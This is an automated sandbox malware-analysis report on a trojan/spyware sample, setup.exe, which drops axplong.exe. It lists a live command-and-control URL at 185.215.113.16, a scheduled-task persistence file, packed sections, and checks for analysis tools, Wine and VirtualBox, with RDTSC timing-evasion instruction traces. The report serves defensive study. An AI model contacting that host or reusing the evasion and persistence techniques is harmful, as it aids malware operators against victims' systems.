                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000004.00000002.3321500762.00000000010AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php$
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php-
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php6
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php7
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php8
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpH
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpHead
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpIG
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpP
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpT
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpW
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpX
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php_
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcoded
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpeGk
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedi
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phps
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpw
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=E?

                    System Summary

                    barindex
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: .idata
                    Source: setup.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0050E4404_2_0050E440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_005430684_2_00543068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_00504CF04_2_00504CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_00537D834_2_00537D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0054765B4_2_0054765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_00504AF04_2_00504AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0054777B4_2_0054777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_00546F094_2_00546F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_005487204_2_00548720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_00542BD04_2_00542BD0
                    Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: setup.exeStatic PE information: Section: ZLIB complexity 0.9974508259536785
                    Source: setup.exeStatic PE information: Section: aosdyjib ZLIB complexity 0.9943002053730018
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9974508259536785
                    Source: axplong.exe.0.drStatic PE information: Section: aosdyjib ZLIB complexity 0.9943002053730018
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: setup.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: setup.exeStatic file information: File size 1933312 > 1048576
                    Source: setup.exeStatic PE information: Raw size of aosdyjib is bigger than: 0x100000 < 0x1a6400

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 0.2.setup.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 4.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.drStatic PE information: real checksum: 0x1d8aa2 should be: 0x1dafb5
                    Source: setup.exeStatic PE information: real checksum: 0x1d8aa2 should be: 0x1dafb5
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: .idata
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: aosdyjib
                    Source: setup.exeStatic PE information: section name: ttauocqi
                    Source: setup.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: aosdyjib
                    Source: axplong.exe.0.drStatic PE information: section name: ttauocqi
                    Source: axplong.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0051D84C push ecx; ret 4_2_0051D85F
                    Source: setup.exeStatic PE information: section name: entropy: 7.982355367742593
                    Source: setup.exeStatic PE information: section name: aosdyjib entropy: 7.955301660952693
                    Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.982355367742593
                    Source: axplong.exe.0.drStatic PE information: section name: aosdyjib entropy: 7.955301660952693
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 1FEA45 second address: 1FEA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 1FEA49 second address: 1FEA5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F47D8E4826Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 1FEA5F second address: 1FEA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 37BAA0 second address: 37BAC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48277h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 38115F second address: 381165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 381165 second address: 381172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F47D8E4826Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 37BA7D second address: 37BAA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F47D8E3B0A6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 383116 second address: 38311A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 38311A second address: 383124 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 383124 second address: 383129 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 383129 second address: 38317C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F47D8E3B0B8h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F47D8E3B0ADh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push ecx 0x00000019 jnl 00007F47D8E3B0B0h 0x0000001f jmp 00007F47D8E3B0AAh 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b je 00007F47D8E3B0A8h 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 383228 second address: 383231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 383231 second address: 383235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 383235 second address: 383272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 19527DC1h 0x0000000e mov di, 1A5Dh 0x00000012 push 00000003h 0x00000014 ja 00007F47D8E4826Ch 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D1AA4h], esi 0x00000022 push 00000003h 0x00000024 mov si, 955Ch 0x00000028 mov esi, 0D0CE35Fh 0x0000002d push D018154Eh 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 383272 second address: 3832A3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b xor dword ptr [esp], 1018154Eh 0x00000012 mov ch, 86h 0x00000014 mov esi, dword ptr [ebp+122D3684h] 0x0000001a lea ebx, dword ptr [ebp+1245806Ah] 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F47D8E3B0ABh 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3832A3 second address: 3832A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
